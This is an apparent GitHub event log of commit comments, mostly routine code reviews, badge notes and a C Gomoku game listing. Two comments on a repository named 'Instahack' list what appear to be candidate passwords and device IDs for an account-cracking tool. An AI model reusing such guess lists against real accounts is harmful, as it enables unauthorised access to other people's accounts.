{"id":"7974940290","type":"CommitCommentEvent","actor":{"login":"Penia"},"repo":{"name":"Penia/ozelmoodle"},"payload":{"comment":{"id":29730961,"position":null,"line":null,"path":null,"commit_id":"7a8d92a6c38b5d48445a79c9a992dbfd3bca4652","created_at":"2018-07-17T07:46:54Z","updated_at":"2018-07-17T07:46:54Z","author_association":"OWNER","body":"nice"}},"created_at":"2018-07-17T07:46:54Z"}
{"id":"7974941243","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29730964,"position":null,"line":null,"path":null,"commit_id":"b926ea8856da4bebb44bdcd2b2b103a34a9e552b","created_at":"2018-07-17T07:47:06Z","updated_at":"2018-07-17T07:47:06Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-291](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-291).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-291-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-17T07:47:06Z"}
{"id":"7974942129","type":"CommitCommentEvent","actor":{"login":"handerek"},"repo":{"name":"handerek/token-profile"},"payload":{"comment":{"id":29730967,"position":null,"line":null,"path":null,"commit_id":"e043ba811b106cf1254c10658aa0417eb73133dc","created_at":"2018-07-17T07:47:17Z","updated_at":"2018-07-17T07:47:17Z","author_association":"OWNER","body":"add mott "}},"created_at":"2018-07-17T07:47:17Z"}
{"id":"7974946450","type":"CommitCommentEvent","actor":{"login":"brusoman"},"repo":{"name":"brusoman/Angular-components"},"payload":{"comment":{"id":29730974,"position":40,"line":45,"path":"src/app/components/dialog/dialog.component.scss","commit_id":"86df577c7763c8264ddfcc7638212afd98a6598d","created_at":"2018-07-17T07:48:13Z","updated_at":"2018-07-17T07:48:13Z","author_association":"OWNER","body":"Сделал"}},"created_at":"2018-07-17T07:48:13Z"}
{"id":"7974948796","type":"CommitCommentEvent","actor":{"login":"arnavGit"},"repo":{"name":"arnavGit/chk"},"payload":{"comment":{"id":29730984,"position":5,"line":3,"path":"README.md","commit_id":"8f39e756e41c99bfd2f8e3020cb2f5dc0da62414","created_at":"2018-07-17T07:48:41Z","updated_at":"2018-07-17T07:48:41Z","author_association":"OWNER","body":"# This is going to be a JS project"}},"created_at":"2018-07-17T07:48:41Z"}
{"id":"7974950048","type":"CommitCommentEvent","actor":{"login":"unstabler"},"repo":{"name":"korLethean/LSH"},"payload":{"comment":{"id":29730987,"position":7,"line":204,"path":"PBKDF_test/testvector/PBKDF_LSH-256_224.txt","commit_id":"6ec1498aacc13332a84ba80fd303d0f32cf1d559","created_at":"2018-07-17T07:48:57Z","updated_at":"2018-07-17T07:48:57Z","author_association":"NONE","body":"COUNT = 40"}},"created_at":"2018-07-17T07:48:57Z"}
{"id":"7974961183","type":"CommitCommentEvent","actor":{"login":"NJCTL"},"repo":{"name":"movidius/ncappzoo"},"payload":{"comment":{"id":29731019,"position":null,"line":null,"path":null,"commit_id":"abf59054b0695ebbd1943b15a4d1bbe25f996a0b","created_at":"2018-07-17T07:51:15Z","updated_at":"2018-07-17T07:51:15Z","author_association":"NONE","body":"![screenshot from 2018-07-17 15-46-03](https://user-images.githubusercontent.com/41321671/42803627-1cb9f622-89d9-11e8-93ea-d1af367eec0e.png)\r\nHi. I have this problem running video_objects_scalable. Do you mind help me with this? Thank you."}},"created_at":"2018-07-17T07:51:15Z"}
{"id":"7974961379","type":"CommitCommentEvent","actor":{"login":"kendrick004"},"repo":{"name":"questronix/talent_block"},"payload":{"comment":{"id":29731020,"position":24,"line":29,"path":"src/pages/Home.vue","commit_id":"96756a2614dc78291a5db7421b66cddb3f977809","created_at":"2018-07-17T07:51:17Z","updated_at":"2018-07-17T07:51:17Z","author_association":"CONTRIBUTOR","body":"Equiped*"}},"created_at":"2018-07-17T07:51:17Z"}
{"id":"7974965875","type":"CommitCommentEvent","actor":{"login":"ddos-kaz"},"repo":{"name":"ddos-kaz/project-lvl2-s297"},"payload":{"comment":{"id":29731033,"position":1,"line":1,"path":"README.md","commit_id":"689f8ea55e2b73ec1a9a9c9af6d7fa4f3a929968","created_at":"2018-07-17T07:52:12Z","updated_at":"2018-07-17T07:52:12Z","author_association":"OWNER","body":"<a href=\"https://codeclimate.com/github/ddos-kaz/project-lvl2-s297/maintainability\"><img src=\"https://api.codeclimate.com/v1/badges/c7f46f2ffad72d29b299/maintainability\" /></a>"}},"created_at":"2018-07-17T07:52:12Z"}
{"id":"7974967213","type":"CommitCommentEvent","actor":{"login":"dhtdht020"},"repo":{"name":"OpenShopChannel/Open-Shop-SOAP"},"payload":{"comment":{"id":29731035,"position":null,"line":null,"path":null,"commit_id":"f5428518f79db0abc12c4d728b9da62d5b0044b9","created_at":"2018-07-17T07:52:29Z","updated_at":"2018-07-17T07:52:29Z","author_association":"CONTRIBUTOR","body":"# CHANGE YOUR NICKNAME BILLY"}},"created_at":"2018-07-17T07:52:29Z"}
{"id":"7974967478","type":"CommitCommentEvent","actor":{"login":"ddos-kaz"},"repo":{"name":"ddos-kaz/project-lvl2-s297"},"payload":{"comment":{"id":29731036,"position":1,"line":1,"path":"README.md","commit_id":"689f8ea55e2b73ec1a9a9c9af6d7fa4f3a929968","created_at":"2018-07-17T07:52:33Z","updated_at":"2018-07-17T07:52:33Z","author_association":"OWNER","body":"<a href=\"https://codeclimate.com/github/ddos-kaz/project-lvl2-s297/test_coverage\"><img src=\"https://api.codeclimate.com/v1/badges/c7f46f2ffad72d29b299/test_coverage\" /></a>"}},"created_at":"2018-07-17T07:52:33Z"}
{"id":"7974968840","type":"CommitCommentEvent","actor":{"login":"ddos-kaz"},"repo":{"name":"ddos-kaz/project-lvl2-s297"},"payload":{"comment":{"id":29731038,"position":null,"line":null,"path":null,"commit_id":"689f8ea55e2b73ec1a9a9c9af6d7fa4f3a929968","created_at":"2018-07-17T07:52:50Z","updated_at":"2018-07-17T07:52:50Z","author_association":"OWNER","body":"Attached to CodeClimate"}},"created_at":"2018-07-17T07:52:50Z"}
{"id":"7974973377","type":"CommitCommentEvent","actor":{"login":"chenweiji"},"repo":{"name":"chenweiji/cici"},"payload":{"comment":{"id":29731046,"position":null,"line":null,"path":null,"commit_id":"e7fb286af3313d5bc162370d55c6e504dec9f4c7","created_at":"2018-07-17T07:53:48Z","updated_at":"2018-07-17T07:53:48Z","author_association":"OWNER","body":"删的好，哈哈"}},"created_at":"2018-07-17T07:53:48Z"}
{"id":"7974973875","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"mrNkravchenko/yii2"},"payload":{"comment":{"id":29731047,"position":14,"line":37,"path":"commands/UserLogController.php","commit_id":"fd6b6b2fddcf1658114ae3dcbf055b84763f57fe","created_at":"2018-07-17T07:53:54Z","updated_at":"2018-07-17T07:53:54Z","author_association":"NONE","body":"старайся удалять комментарии из гита. Точнее не коммитить их)"}},"created_at":"2018-07-17T07:53:54Z"}
{"id":"7974974124","type":"CommitCommentEvent","actor":{"login":"brusoman"},"repo":{"name":"brusoman/Angular-components"},"payload":{"comment":{"id":29731048,"position":9,"line":9,"path":"src/app/components/growl/growl.module.ts","commit_id":"86df577c7763c8264ddfcc7638212afd98a6598d","created_at":"2018-07-17T07:53:58Z","updated_at":"2018-07-17T07:53:58Z","author_association":"OWNER","body":"Переименовано"}},"created_at":"2018-07-17T07:53:58Z"}
{"id":"7974976076","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"mrNkravchenko/yii2"},"payload":{"comment":{"id":29731054,"position":15,"line":38,"path":"commands/UserLogController.php","commit_id":"fd6b6b2fddcf1658114ae3dcbf055b84763f57fe","created_at":"2018-07-17T07:54:23Z","updated_at":"2018-07-17T07:54:23Z","author_association":"NONE","body":"$model все же лучше читается чем value)"}},"created_at":"2018-07-17T07:54:23Z"}
{"id":"7974976156","type":"CommitCommentEvent","actor":{"login":"chenweiji"},"repo":{"name":"chenweiji/cici"},"payload":{"comment":{"id":29731056,"position":null,"line":null,"path":null,"commit_id":"f3d32fc56fcd881623c7f25278dbc8623e2c761a","created_at":"2018-07-17T07:54:24Z","updated_at":"2018-07-17T07:54:24Z","author_association":"OWNER","body":"删的好，哈哈"}},"created_at":"2018-07-17T07:54:24Z"}
{"id":"7974976684","type":"CommitCommentEvent","actor":{"login":"chenweiji"},"repo":{"name":"chenweiji/cici"},"payload":{"comment":{"id":29731058,"position":null,"line":null,"path":null,"commit_id":"f3d32fc56fcd881623c7f25278dbc8623e2c761a","created_at":"2018-07-17T07:54:31Z","updated_at":"2018-07-17T07:54:31Z","author_association":"OWNER","body":"good"}},"created_at":"2018-07-17T07:54:31Z"}
{"id":"7974977403","type":"CommitCommentEvent","actor":{"login":"scamille"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":29731061,"position":null,"line":null,"path":null,"commit_id":"7bb41e955b3a79669a0bb462c86144e2659d17e6","created_at":"2018-07-17T07:54:39Z","updated_at":"2018-07-17T07:54:39Z","author_association":"MEMBER","body":"Great even added it to the gui :-)\r\n\r\nPlease use the new make_buff function instead of buff_creator_t going forwards please.\r\n\r\nThe main problem I see here: Don't we have any composite_attack_power_multiplier() function where this should go into instead? This way you can't add any other additive things into any derived composite_attack_power functions, and calculations are likely to be off."}},"created_at":"2018-07-17T07:54:39Z"}
{"id":"7974981931","type":"CommitCommentEvent","actor":{"login":"bouncyball-git"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29731064,"position":null,"line":null,"path":null,"commit_id":"fc09b9a3aac2e62b0f10a7321079d872b0e5bb56","created_at":"2018-07-17T07:55:34Z","updated_at":"2018-07-17T07:55:34Z","author_association":"COLLABORATOR","body":"Great!"}},"created_at":"2018-07-17T07:55:34Z"}
{"id":"7974982099","type":"CommitCommentEvent","actor":{"login":"MikeJerry"},"repo":{"name":"MikeJerry/easy-games"},"payload":{"comment":{"id":29731065,"position":null,"line":null,"path":null,"commit_id":"ce93caae62edc6703c9f5da2bded789d88d9506e","created_at":"2018-07-17T07:55:36Z","updated_at":"2018-07-17T07:55:36Z","author_association":"OWNER","body":"#include <stdlib.h>\r\n#include <stdio.h>\r\n#include <conio.h>\r\n#include <string.h>\r\n \r\n#define MAXIMUS 15 //定义棋盘大小\r\n \r\nint p[MAXIMUS][MAXIMUS];//存储对局信息\r\nchar buff[MAXIMUS * 2 + 1][MAXIMUS * 4 + 3]; //输出缓冲器\r\nint Cx, Cy; //当前光标位置\r\nint Now;//当前走子的玩家，1代表黑，2代表白\r\nint wl, wp; //当前写入缓冲器的列数和行数位置\r\nchar* showText;//在棋盘中央显示的文字信息\r\nint count;//回合数\r\n \r\nchar* Copy ( char* strDest, const char* strSrc ) //修改过的字符串复制函数，会忽略末端的\\0\r\n{\r\n    char* strDestCopy = strDest;\r\n \r\n    while ( *strSrc != '\\0' )\r\n    {\r\n        *strDest++ = *strSrc++;\r\n    }\r\n \r\n    return strDestCopy;\r\n}\r\nvoid Initialize() //初始化一个对局函数\r\n{\r\n    int i, j; //循环变量\r\n    showText = \"\"; //重置显示信息\r\n    count = 0; //回合数归零\r\n \r\n    for ( i = 0; i < MAXIMUS; i++ ) //重置对局数据\r\n    {\r\n        for ( j = 0; j < MAXIMUS; j++ )\r\n        {\r\n            p[i][j] = 0;\r\n        }\r\n    }\r\n \r\n    Cx = Cy = MAXIMUS / 2; //重置光标到中央\r\n    Now = 1; //重置当前为黑方\r\n}\r\nchar* getStyle ( int i, int j ) //获得棋盘中指定坐标交点位置的字符，通过制表符拼成棋盘\r\n{\r\n    if ( p[i][j] == 1 ) //1为黑子\r\n        return \"●\";\r\n    else if ( p[i][j] == 2 ) //2为白子\r\n        return \"○\";\r\n    else if ( i == 0 && j == 0 ) //以下为边缘棋盘样式\r\n        return \"┏\";\r\n    else if ( i == MAXIMUS - 1 && j == 0 )\r\n        return \"┓\";\r\n    else if ( i == MAXIMUS - 1 && j == MAXIMUS - 1 )\r\n        return \"┛\";\r\n    else if ( i == 0 && j == MAXIMUS - 1 )\r\n        return \"┗\";\r\n    else if ( i == 0 )\r\n        return \"┠\";\r\n    else if ( i == MAXIMUS - 1 )\r\n        return \"┨\";\r\n    else if ( j == 0 )\r\n        return \"┯\";\r\n    else if ( j == MAXIMUS - 1 )\r\n        return \"┷\";\r\n \r\n    return \"┼\";//中间的空位\r\n}\r\nchar* getCurse ( int i, int j ) //获得指定坐标交点位置左上格的样式，通过制表符来模拟光标的显示\r\n{\r\n    if ( i == Cx )\r\n    {\r\n        if ( j == Cy )\r\n            return \"┏\";\r\n        else if ( j == Cy + 1 )\r\n            return \"┗\";\r\n    }\r\n    else if ( i == Cx + 1 )\r\n    {\r\n        if ( j == Cy )\r\n            return \"┓\";\r\n        else if ( j == Cy + 1 )\r\n            return \"┛\";\r\n    }\r\n \r\n    return \"　\";//如果不在光标附近则为空\r\n}\r\nvoid write ( char* c ) //向缓冲器写入字符串\r\n{\r\n    Copy ( buff[wl] + wp, c );\r\n    wp += strlen ( c );\r\n}\r\nvoid ln() //缓冲器写入位置提行\r\n{\r\n    wl += 1;\r\n    wp = 0;\r\n}\r\nvoid Display() //将缓冲器内容输出到屏幕\r\n{\r\n    int i, l = strlen ( showText ); //循环变量，中间文字信息的长度\r\n    int Offset = MAXIMUS * 2 + 2 - l / 2; //算出中间文字信息居中显示所在的横坐标位置\r\n \r\n    if ( Offset % 2 == 1 ) //如果位置为奇数，则移动到偶数，避免混乱\r\n    {\r\n        Offset--;\r\n    }\r\n \r\n    Copy ( buff[MAXIMUS] + Offset, showText ); //讲中间文字信息复制到缓冲器\r\n \r\n    if ( l % 2 == 1 ) //如果中间文字长度为半角奇数，则补上空格，避免混乱\r\n    {\r\n        * ( buff[MAXIMUS] + Offset + l ) = 0x20;\r\n    }\r\n \r\n    system ( \"cls\" ); //清理屏幕，准备写入\r\n \r\n    for ( i = 0; i < MAXIMUS * 2 + 1; i++ ) //循环写入每一行\r\n    {\r\n        printf ( \"%s\", buff[i] );\r\n \r\n        if ( i < MAXIMUS * 2 ) //写入完每一行需要换行\r\n            printf ( \"\\n\" );\r\n    }\r\n}\r\nvoid Print() //将整个棋盘算出并储存到缓冲器，然后调用Display函数显示出来\r\n{\r\n    int i, j; //循环变量\r\n    wl = 0;\r\n    wp = 0;\r\n \r\n    for ( j = 0; j <= MAXIMUS; j++ ) //写入出交点左上角的字符，因为需要打印棋盘右下角，所以很以横纵各多一次循环\r\n    {\r\n        for ( i = 0; i <= MAXIMUS; i++ )\r\n        {\r\n            write ( getCurse ( i, j ) ); //写入左上角字符\r\n \r\n            if ( j == 0 || j == MAXIMUS ) //如果是棋上下盘边缘则没有连接的竖线，用空格填充位置\r\n            {\r\n                if ( i != MAXIMUS )\r\n                    write ( \"　\" );\r\n            }\r\n            else//如果在棋盘中间则用竖线承接上下\r\n            {\r\n                if ( i == 0 || i == MAXIMUS - 1 ) //左右边缘的竖线更粗\r\n                    write ( \"┃\" );\r\n                else if ( i != MAXIMUS ) //中间的竖线\r\n                    write ( \"│\" );\r\n            }\r\n        }\r\n \r\n        if ( j == MAXIMUS ) //如果是最后一次循环，则只需要处理边侧字符，交点要少一排\r\n        {\r\n            break;\r\n        }\r\n \r\n        ln();//提行开始打印交点内容\r\n        write ( \"　\" ); //用空位补齐位置\r\n \r\n        for ( i = 0; i < MAXIMUS; i++ ) //按横坐标循环正常的次数\r\n        {\r\n            write ( getStyle ( i, j ) ); //写入交点字符\r\n \r\n            if ( i != MAXIMUS - 1 ) //如果不在最右侧则补充一个横线承接左右\r\n            {\r\n                if ( j == 0 || j == MAXIMUS - 1 )\r\n                {\r\n                    write ( \"━\" ); //上下边缘的横线更粗\r\n                }\r\n                else\r\n                {\r\n                    write ( \"—\" ); //中间的横线\r\n                }\r\n            }\r\n        }\r\n \r\n        ln();//写完一行后提行\r\n    }\r\n \r\n    Display();//将缓冲器内容输出到屏幕\r\n}\r\nint Put() //在当前光标位置走子，如果非空，则返回0表示失败\r\n{\r\n    if ( p[Cx][Cy] == 0 )\r\n    {\r\n        p[Cx][Cy] = Now; //改变该位置数据\r\n        return 1;//返回1表示成功\r\n    }\r\n    else\r\n    {\r\n        return 0;\r\n    }\r\n}\r\nint Check() //胜负检查，即判断当前走子位置有没有造成五连珠的情况\r\n{\r\n    int w = 1, x = 1, y = 1, z = 1, i; //累计横竖正斜反邪四个方向的连续相同棋子数目\r\n \r\n    for ( i = 1; i < 5; i++ ) if ( Cy + i < MAXIMUS && p[Cx][Cy + i] == Now ) w++;\r\n        else break;//向下检查\r\n \r\n    for ( i = 1; i < 5; i++ ) if ( Cy - i > 0 && p[Cx][Cy - i] == Now ) w++;\r\n        else break;//向上检查\r\n \r\n    if ( w >= 5 ) return Now; //若果达到5个则判断当前走子玩家为赢家\r\n \r\n    for ( i = 1; i < 5; i++ ) if ( Cx + i < MAXIMUS && p[Cx + i][Cy] == Now ) x++;\r\n        else break;//向右检查\r\n \r\n    for ( i = 1; i < 5; i++ ) if ( Cx - i > 0 && p[Cx - i][Cy] == Now ) x++;\r\n        else break;//向左检查\r\n \r\n    if ( x >= 5 ) return Now; //若果达到5个则判断当前走子玩家为赢家\r\n \r\n    for ( i = 1; i < 5; i++ ) if ( Cx + i < MAXIMUS && Cy + i < MAXIMUS && p[Cx + i][Cy + i] == Now ) y++;\r\n        else break;//向右下检查\r\n \r\n    for ( i = 1; i < 5; i++ ) if ( Cx - i > 0 && Cy - i > 0 && p[Cx - i][Cy - i] == Now ) y++;\r\n        else break;//向左上检查\r\n \r\n    if ( y >= 5 ) return Now; //若果达到5个则判断当前走子玩家为赢家\r\n \r\n    for ( i = 1; i < 5; i++ ) if ( Cx + i < MAXIMUS && Cy - i > 0 && p[Cx + i][Cy - i] == Now ) z++;\r\n        else break;//向右上检查\r\n \r\n    for ( i = 1; i < 5; i++ ) if ( Cx - i > 0 && Cy + i < MAXIMUS && p[Cx - i][Cy + i] == Now ) z++;\r\n        else break;//向左下检查\r\n \r\n    if ( z >= 5 ) return Now; //若果达到5个则判断当前走子玩家为赢家\r\n \r\n    return 0;//若没有检查到五连珠，则返回0表示还没有玩家达成胜利\r\n}\r\n \r\nint RunGame() //进行整个对局，返回赢家信息(虽然有用上)\r\n{\r\n    int input;//输入变量\r\n    int victor;//赢家信息\r\n    Initialize();//初始化对局\r\n \r\n    while ( 1 ) //开始无限回合的死循环，直到出现胜利跳出\r\n    {\r\n        Print();//打印棋盘\r\n        input = getch(); //等待键盘按下一个字符\r\n \r\n        if ( input == 27 ) //如果是ESC则退出程序\r\n        {\r\n            exit ( 0 );\r\n        }\r\n        else if ( input == 0x20 ) //如果是空格则开始走子\r\n        {\r\n            if ( Put() ) //如果走子成功则判断胜负\r\n            {\r\n                victor = Check();\r\n                Now = 3 - Now; //轮换当前走子玩家\r\n                count++;\r\n \r\n                if ( victor == 1 ) //如果黑方达到胜利，显示提示文字并等待一次按键，返回胜利信息\r\n                {\r\n                    showText = \"黑方获得了胜利！\";\r\n                    Print();\r\n \r\n                    if ( getch() == 0xE0 )\r\n                    {\r\n                        getch();\r\n                    }\r\n \r\n                    return Now;\r\n                }\r\n                else if ( victor == 2 ) //如果白方达到胜利，显示提示文字并等待一次按键，返回胜利信息\r\n                {\r\n                    showText = \"白方获得了胜利！\";\r\n                    Display();\r\n \r\n                    if ( getch() == 0xE0 )\r\n                    {\r\n                        getch();\r\n                    }\r\n \r\n                    return Now;\r\n                }\r\n                else if ( count == MAXIMUS * MAXIMUS ) //如果回合数达到了棋盘总量，即棋盘充满，即为平局\r\n                {\r\n                    showText = \"平局！\";\r\n                    Display();\r\n \r\n                    if ( getch() == 0xE0 )\r\n                    {\r\n                        getch();\r\n                    }\r\n \r\n                    return 0;\r\n                }\r\n            }\r\n        }\r\n        else if ( input == 0xE0 ) //如果按下的是方向键，会填充两次输入，第一次为0xE0表示按下的是控制键\r\n        {\r\n            input = getch(); //获得第二次输入信息\r\n \r\n            switch ( input ) //判断方向键方向并移动光标位置\r\n            {\r\n                case 0x4B://\r\n                    Cx--;\r\n                    break;\r\n \r\n                case 0x48:\r\n                    Cy--;\r\n                    break;\r\n \r\n                case 0x4D:\r\n                    Cx++;\r\n                    break;\r\n \r\n                case 0x50:\r\n                    Cy++;\r\n                    break;\r\n            }\r\n \r\n            if ( Cx < 0 ) Cx = MAXIMUS - 1; //如果光标位置越界则移动到对侧\r\n \r\n            if ( Cy < 0 ) Cy = MAXIMUS - 1;\r\n \r\n            if ( Cx > MAXIMUS - 1 ) Cx = 0;\r\n \r\n            if ( Cy > MAXIMUS - 1 ) Cy = 0;\r\n        }\r\n    }\r\n}\r\nint main() //主函数\r\n{\r\n    system ( \"title 简易五子棋 ——Etsnarl制作\" ); //设置标题\r\n    system ( \"mode con cols=63 lines=32\" ); //设置窗口大小\r\n    system ( \"color E0\" ); //设置颜色\r\n \r\n    while ( 1 ) //循环执行游戏\r\n    {\r\n        RunGame();\r\n    }\r\n}"}},"created_at":"2018-07-17T07:55:36Z"}
{"id":"7974983017","type":"CommitCommentEvent","actor":{"login":"scamille"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":29731067,"position":32,"line":912,"path":"engine/class_modules/warlock/sc_warlock.cpp","commit_id":"b8bd354a30ff8366ad4a68d3f37aca4abea014f2","created_at":"2018-07-17T07:55:46Z","updated_at":"2018-07-17T07:55:46Z","author_association":"MEMBER","body":"You are mixing log and debug here."}},"created_at":"2018-07-17T07:55:46Z"}
{"id":"7974983045","type":"CommitCommentEvent","actor":{"login":"MikeJerry"},"repo":{"name":"MikeJerry/easy-games"},"payload":{"comment":{"id":29731068,"position":null,"line":null,"path":null,"commit_id":"ce93caae62edc6703c9f5da2bded789d88d9506e","created_at":"2018-07-17T07:55:47Z","updated_at":"2018-07-17T07:55:47Z","author_association":"OWNER","body":"五子棋"}},"created_at":"2018-07-17T07:55:47Z"}
{"id":"7974983071","type":"CommitCommentEvent","actor":{"login":"brusoman"},"repo":{"name":"brusoman/Angular-components"},"payload":{"comment":{"id":29731069,"position":10,"line":9,"path":"src/app/showcase/growl-showcase/growl-showcase.component.html","commit_id":"86df577c7763c8264ddfcc7638212afd98a6598d","created_at":"2018-07-17T07:55:47Z","updated_at":"2018-07-17T07:55:47Z","author_association":"OWNER","body":"Да, т.к. относительно него будут позиционироваться все growl-item"}},"created_at":"2018-07-17T07:55:47Z"}
{"id":"7974984522","type":"CommitCommentEvent","actor":{"login":"maakep"},"repo":{"name":"maakep/cgj2018"},"payload":{"comment":{"id":29731072,"position":null,"line":null,"path":null,"commit_id":"4a998da524573c0a2a68a9aadbb99418503caf2d","created_at":"2018-07-17T07:56:03Z","updated_at":"2018-07-17T07:56:03Z","author_association":"OWNER","body":"Why Single.MinValue? Does it have a performance impact?"}},"created_at":"2018-07-17T07:56:03Z"}
{"id":"7974988376","type":"CommitCommentEvent","actor":{"login":"EvanMichaels"},"repo":{"name":"simulationcraft/simc"},"payload":{"comment":{"id":29731075,"position":null,"line":null,"path":null,"commit_id":"7bb41e955b3a79669a0bb462c86144e2659d17e6","created_at":"2018-07-17T07:56:46Z","updated_at":"2018-07-17T07:56:46Z","author_association":"CONTRIBUTOR","body":"I moved it into that function in a later commit.\n\nTried using make_buff and it was complaining about something and wouldn't\ncompile. Not sure why, so I just copied the Arcane Int. :)\n\nOn Tue, Jul 17, 2018 at 3:54 AM Serge Camille <notifications@github.com>\nwrote:\n\n> Great even added it to the gui :-)\n>\n> Please use the new make_buff function instead of buff_creator_t going\n> forwards please.\n>\n> The main problem I see here: Don't we have any\n> composite_attack_power_multiplier() function where this should go into\n> instead? This way you can't add any other additive things into any derived\n> composite_attack_power functions, and calculations are likely to be off.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/simulationcraft/simc/commit/7bb41e955b3a79669a0bb462c86144e2659d17e6#commitcomment-29731061>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AXmGaKNNUYoTAd8qdrllgQe0i4IjdXDrks5uHZhCgaJpZM4VSWxb>\n> .\n>\n"}},"created_at":"2018-07-17T07:56:46Z"}
{"id":"7974991184","type":"CommitCommentEvent","actor":{"login":"schrodinger-cat"},"repo":{"name":"schrodinger-cat/markup-training"},"payload":{"comment":{"id":29731080,"position":14,"line":16,"path":"templates/index.pug","commit_id":"ac3ad4b005acca8573243822448e0484a307df17","created_at":"2018-07-17T07:57:18Z","updated_at":"2018-07-17T07:57:18Z","author_association":"OWNER","body":"ноуп, кэмэлкейс не нужен – `header__button`"}},"created_at":"2018-07-17T07:57:18Z"}
{"id":"7974991555","type":"CommitCommentEvent","actor":{"login":"brusoman"},"repo":{"name":"brusoman/Angular-components"},"payload":{"comment":{"id":29731081,"position":10,"line":9,"path":"src/app/showcase/growl-showcase/growl-showcase.component.html","commit_id":"86df577c7763c8264ddfcc7638212afd98a6598d","created_at":"2018-07-17T07:57:23Z","updated_at":"2018-07-17T07:57:23Z","author_association":"OWNER","body":"Переименовано"}},"created_at":"2018-07-17T07:57:23Z"}
{"id":"7974997913","type":"CommitCommentEvent","actor":{"login":"lina765"},"repo":{"name":"avramit/Instahack"},"payload":{"comment":{"id":29731091,"position":null,"line":null,"path":null,"commit_id":"3a9591fbe6c287fc1f28202a12ce31407ad5206b","created_at":"2018-07-17T07:58:38Z","updated_at":"2018-07-17T07:58:38Z","author_association":"NONE","body":"[deviceId.txt](https://github.com/avramit/Instahack/files/2200691/deviceId.txt)\r\n12345\r\n678910\r\n67810\r\n87034\r\n\r\n"}},"created_at":"2018-07-17T07:58:38Z"}
{"id":"7974998673","type":"CommitCommentEvent","actor":{"login":"G1n7oki"},"repo":{"name":"G1n7oki/JavaScriptLearn"},"payload":{"comment":{"id":29731093,"position":null,"line":null,"path":null,"commit_id":"256efc481234ee7524b49b5347c0d55b44353429","created_at":"2018-07-17T07:58:46Z","updated_at":"2018-07-17T07:58:46Z","author_association":"OWNER","body":"11"}},"created_at":"2018-07-17T07:58:46Z"}
{"id":"7975004999","type":"CommitCommentEvent","actor":{"login":"at-dev-support-01"},"repo":{"name":"akaj-team/intern-18-summer"},"payload":{"comment":{"id":29731102,"position":33,"line":null,"path":"app/src/at-trivo/java/asiantech/internship/summer/asynctack_thread_handler/downloaders/Downloader.java","commit_id":"3ee809250a4d4c67e24ad087df83aa465ed65178","created_at":"2018-07-17T08:00:01Z","updated_at":"2018-07-17T08:00:01Z","author_association":"NONE","body":"WARNING: [AvoidPrintStackTrace] Avoid printStackTrace(); use a logger call instead.\nhttps://pmd.github.io/pmd-5.6.1/pmd-java/rules/java/logging-java.html#AvoidPrintStackTrace"}},"created_at":"2018-07-17T08:00:01Z"}
{"id":"7975005783","type":"CommitCommentEvent","actor":{"login":"zxt1991"},"repo":{"name":"zxt1991/dsj"},"payload":{"comment":{"id":29731105,"position":null,"line":null,"path":null,"commit_id":"ec29b7c5fba133b16ffe83c94d2f6d1f3ac3d6dc","created_at":"2018-07-17T08:00:11Z","updated_at":"2018-07-17T08:00:11Z","author_association":"OWNER","body":"sss"}},"created_at":"2018-07-17T08:00:11Z"}
{"id":"7975008215","type":"CommitCommentEvent","actor":{"login":"cevio"},"repo":{"name":"cevio/super-vuex"},"payload":{"comment":{"id":29731117,"position":4,"line":22,"path":"src/index.js","commit_id":"902f15a36b2b8d02f6ed2316909a2f7f5f28929a","created_at":"2018-07-17T08:00:35Z","updated_at":"2018-07-17T08:00:35Z","author_association":"OWNER","body":"修正对主模块的store数据调用和操作：https://github.com/cevio/super-vuex/issues/3"}},"created_at":"2018-07-17T08:00:35Z"}
{"id":"7975010571","type":"CommitCommentEvent","actor":{"login":"lina765"},"repo":{"name":"avramit/Instahack"},"payload":{"comment":{"id":29731126,"position":null,"line":null,"path":null,"commit_id":"3a9591fbe6c287fc1f28202a12ce31407ad5206b","created_at":"2018-07-17T08:01:04Z","updated_at":"2018-07-17T08:01:04Z","author_association":"NONE","body":"Makan123\r\nRimdu makan\r\nMakan1234\r\nMakam54321\r\n[download_status.txt](https://github.com/avramit/Instahack/files/2200701/download_status.txt)\r\n"}},"created_at":"2018-07-17T08:01:04Z"}
{"id":"7975015622","type":"CommitCommentEvent","actor":{"login":"switz"},"repo":{"name":"RelistenNet/relisten-sonos"},"payload":{"comment":{"id":29731138,"position":10,"line":19,"path":"src/logger.js","commit_id":"47c9cc0f9a06d847cb142a8bddb4f7073877e5d0","created_at":"2018-07-17T08:02:06Z","updated_at":"2018-07-17T08:02:06Z","author_association":"MEMBER","body":"can we export `I` separately instead of attaching it to `winston` (since it's an external module)?"}},"created_at":"2018-07-17T08:02:06Z"}
{"id":"7975018474","type":"CommitCommentEvent","actor":{"login":"v1kku"},"repo":{"name":"frappe/erpnext"},"payload":{"comment":{"id":29731144,"position":null,"line":null,"path":null,"commit_id":"fc0a5833a52a329ecad5c32179f2e60cb48e5030","created_at":"2018-07-17T08:02:42Z","updated_at":"2018-07-17T08:02:42Z","author_association":"NONE","body":"This doesn't run. There's a tab error.\r\n\r\n`TabError: inconsistent use of tabs and spaces in indentation`"}},"created_at":"2018-07-17T08:02:42Z"}
{"id":"7975019086","type":"CommitCommentEvent","actor":{"login":"brusoman"},"repo":{"name":"brusoman/Angular-components"},"payload":{"comment":{"id":29731145,"position":null,"line":null,"path":null,"commit_id":"86df577c7763c8264ddfcc7638212afd98a6598d","created_at":"2018-07-17T08:02:50Z","updated_at":"2018-07-17T08:02:50Z","author_association":"OWNER","body":"Сделано"}},"created_at":"2018-07-17T08:02:50Z"}
